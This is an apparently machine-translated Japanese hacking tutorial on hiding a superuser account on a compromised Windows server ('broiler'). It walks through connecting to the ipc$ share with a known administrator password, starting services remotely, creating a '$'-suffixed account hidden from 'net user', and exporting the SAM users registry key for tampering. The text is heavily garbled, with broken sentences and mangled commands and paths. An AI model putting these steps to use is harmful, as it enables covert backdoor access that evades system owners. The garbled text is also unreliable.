、スーパーユーザーを非表示にするには、これらのメソッドのマスター概要は、ユーザーのネットワークを管理し、維持する責任があります。この用語は、NetWare Web上で特別な意味を持ちます。スーパーユーザーは、すべてのファイルのファイル、ディレクトリとファイルへの完全なアクセス権を持っている、インストール後にサーバーにログオンする最初のユーザーです。その後、スーパーユーザーは、すぐにパスワードを変更するので、他のユーザーがサーバーにアクセスすることはできませんし、スーパーユーザへの無制限のアクセスを取得します。だから、システムのスーパーユーザにそれを隠すためにどのように?誰もがスーパーユーザのシステムを隠すための様々な方法を記載されている以下のため。
、遠隔ここで、コマンドラインで
隠されたスーパーユーザを作成する方法で使用されますatを使用して生成されたスケジュール済みタスクがシステムとして実行されているため、psu.exeプログラムは使用されません。 、利用可能なツールをリモートで起動するSC.EXEストリーマーやインナーチューブをNETSVC.EXE開いていない場合は、コマンドで使用できるようにするために、鶏は、サービスを開くためのスケジュールを持っている必要があり、当然のことながら、この方法はまた、長い行に開始予定のサービスとして、することができます。あなたは、このようなMSSQL 1433 SQLEXEC接続ポートを使用して、接続のさまざまなを使用することができ、コマンドラインの
は、また、限り、あなたはcmdshellに乗ることができますよう、telnetサービスを使用することができ、およびコマンド権限であり実行することができます。
1、最初にそれを見つける方法について私はここで話しているトピックではない、ブロイラーを見つけます。ここでは、スーパーユーザーが管理者である見つけると仮定し、パスワードは12345678羽のブロイラーあり、そして今、我々は、リモートそれのためにスーパーユーザーに隠れコマンドラインで起動します。 (ホストの例は、私の地域でホストされ、私は。ハラスメント通常のIPアドレスを避けるために、インターネット上の鳩穴形成していない,,それはIPアドレス13.50.97.238です変更されます)
2、第一および;; 12345678" /ユーザーのネット利用13.50.97.238ipcの$":ブロイラーは、接続コマンド確立"を、管理者がサービスで開始されない場合(ユーザーを作成し、NETSVCのコマンドでブロイラーxiaorongの使用で使用することができ、3
.exeファイルまたはリモートブートへのsc.exe):13.50.97.238 12:51 Cで
:winntsystem32net.exeユーザーのハッカー$ 1234 \\ /
ユーザー名プラス$記号を確立追加し、プラスので、 $記号の後に、ネットユーザーでコマンドラインには、ユーザーは表示されませんが、アカウントマネージャーは、このユーザーを見ることができました。
4、でコマンドHKEY_LOCAL_MACHINEsamsamDomainsaccountusersと同じ派生キー:13.50.97.238 12:55 Cで
:\\ winntregedit.exe /E hacker.reg
HKEY_LOCAL_MACHINESAMSAMDomainsaccountusers
/eはregedit.exeをですパラメータは、_LOCAL_MACHINESAMSAMDomainsaccountusersにこのキーは最後になければなりません。必要に応じて、&'を囲むことができます; C:\\ winntregedit.exe /E hacker.reg HKEY_LOCAL_MACHINESAMSAMDomainsaccountusers'引用符を。